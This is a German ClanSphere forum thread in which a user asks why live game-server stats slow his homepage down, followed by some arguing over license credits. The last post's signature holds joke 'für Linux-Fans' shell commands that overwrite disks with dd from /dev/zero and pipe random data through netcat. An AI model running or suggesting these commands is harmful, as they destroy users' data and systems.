Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 11
Seite [1]
RaPiD


Geekboy




Beiträge: 1192
# Thema - 26.10.2009 um 11:17 Uhr
Hi ich wollte mal fragen woran das es liegt wenn ich dies in meiner index habe und die Homepage bei aktiver Livestats um die 10sec aufbau braucht egal was man klickt.
Kann man das irgend wie fixen das der aufbau wieder schneller vorran geht ?

<div class="contentdiv">
<div class="content5">
<div class="server1">
{servers:navlist:sid=1}
</div>
<div class="server2">
{servers:navlist:sid=2}
</div>
<div class="server3">
{servers:navlist:sid=3}
</div>
</div>
</div>


Live demo: http://problue2.universe-designs.de

PS: das About etc. werde ich heute abend noch unten beim Footer einbauen hab in moment keine zeit für.

EDIT:

Sobald ich den L4D server livestats aus mache rennt alles sind sie an braucht die hp für den seiten aufbau 10sec. Liegt das jetzt an der L4D class im Server modul?


Zuletzt editiert von RaPiD am 24.05.2017 um 19:05 Uhr (3x Editiert)
Inaktiv
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 1 - 26.10.2009 um 11:30 Uhr
Nicht direkt an der Class, sondern an der Abfrage an den Server.
entweder braucht der Server zu lange zum antworten, vlt. aber auch der Transfer zwischen Webspace und Server ist langsam.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
RaPiD
Thread-Ersteller


Geekboy




Beiträge: 1192
# Antwort: 2 - 26.10.2009 um 12:05 Uhr
Na dann werd ich mich damit nun mal schlau machen, thx.


Inaktiv
|
Mindcrime


Geekboy





Beiträge: 1155
# Antwort: 3 - 26.10.2009 um 14:52 Uhr
Die server navliste in deine homepage aufbauen ist eigentlich nicht schlau...

Wenn einer dieser server platt ist, wird die aufbau deiner page mindestens um 30 secs verzoegert...



Inaktiv
|
RaPiD
Thread-Ersteller


Geekboy




Beiträge: 1192
# Antwort: 4 - 26.10.2009 um 17:17 Uhr
@Mindcrime

Ein guter Clan passt auf seine Servers auf besonderst wenn es ein oder zwei Servermaster im clan in der Organisation gibt.
Trotzdem danke für den hinweis das wusste ich vorher aber auch schon.

@Fr33z3m4n

Du hattest recht der L4D server hat irgend wie ne lame leitung oder so hab den einfach ausgetauscht gegen ein weiteren beispiel server. Klappt nun bestens werd dann mal weiter machen muss ja noch das About in Footer hauen, bevor der übliche spruch kommt *hehe*


Inaktiv
|
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 5 - 26.10.2009 um 17:20 Uhr
26.10.2009 um 11:17 Uhr - RaPiD:

PS: das About etc. werde ich heute abend noch unten beim Footer einbauen hab in moment keine zeit für.


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
RaPiD
Thread-Ersteller


Geekboy




Beiträge: 1192
# Antwort: 6 - 26.10.2009 um 17:25 Uhr
Muss ich das jetzt vertsehen Jam2 ? (ô.Ô)
Noch is kein Abend aber richtig lesen da steht das ich es auf die schnelle noch rein setze... ^^


Inaktiv
|
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 7 - 26.10.2009 um 17:32 Uhr
Muss ich verstehen dass du gegen die Lizenzbedingungen von Clansphere (und auch andere) verstößt? Und vor allem "bis heute Abend"? Du weißt schon das man dich wegen soetwas Anzeigen könnte?


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
Dennisen


King for a day





Beiträge: 377
# Antwort: 8 - 26.10.2009 um 17:35 Uhr
Naja, dass musst du erstmal durchkriegen, Jam2. Einfach ist das nicht


Inaktiv
|
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 9 - 26.10.2009 um 17:38 Uhr
Ich sagte auch nicht, dass ich es mache^^


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
RaPiD
Thread-Ersteller


Geekboy




Beiträge: 1192
# Antwort: 10 - 26.10.2009 um 17:41 Uhr
@Jam2

Wie kommst du auf die blöde idee oder gedanken dasi ch jetzt gegen alles verstösse. Denkst Du ich setze gleich als 1 immer das About auf die HP.
Ich sagte bis heute abend werde ich es unter dem Footer setzen, selbst das sollte Dir schon klar machen das ich es nicht vergessen werde. Ich sagte das bevor wieder alle wegen dem About hier antanzen, also komm mal nicht so rüber als würd ich gegen alles verstossen hier -.-^

Wenn hier jemand was verstosst dann ist das Mumie der einfach auf mein Space das Movie modul runter geladen hat ohne zu fragen als ich kurz ein php coder brauchte.
Ich hab auch zugrief auf Wildloins.de aber trotzdem nehm ich nicht einfach seine Module wofür er bezahlt hat.

So nun B2T kann closed problem gelösst.


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 11 - 26.10.2009 um 22:19 Uhr
Das About ist immernoch nicht richtig verlinkt worden.
Desweiteren solltest du dich mal erkundigen in wie fern ein Impresusm Pflichtbestandteil auf einer Internetseite hat, denn auch das fehlt bei dir.

Und nein, nicht wieder wenn du Zeit hast, sondern sofort.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|

Dieses Thema wurde von pHaeno* ClanSphere Team PM geschlossen.

Antworten: 11
Seite [1]